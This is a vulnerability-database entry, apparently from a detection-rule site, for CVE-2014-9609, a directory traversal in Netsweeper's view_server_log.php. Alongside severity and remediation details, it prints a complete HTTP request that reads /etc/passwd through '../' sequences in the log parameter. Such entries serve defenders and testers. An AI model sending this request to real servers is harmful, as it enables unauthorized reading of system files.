🔙 목록으로 돌아가기

CVE-2014-9609: Netsweeper 4.0.8 - Directory Traversal

TitleNetsweeper 4.0.8 - Directory Traversal
Authordaffainfo
SeverityMedium
ImpactAn attacker can read, modify, or delete arbitrary files on the server, potentially leading to unauthorized access, data leakage, or system compromise.
RemediationUpgrade to a patched version of Netsweeper or apply the necessary security patches to fix the directory traversal vulnerability.
CVSS Score5.3
EPSS Score0.33789
CVE IDCVE-2014-9609
CWE IDCWE-22
Tags cve2014 cve netsweeper lfi packetstorm xss vuln

🔍 Vulnerability Description

A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action.

🌐 HTTP Request

GET /webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/59.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-9609.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-9609.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A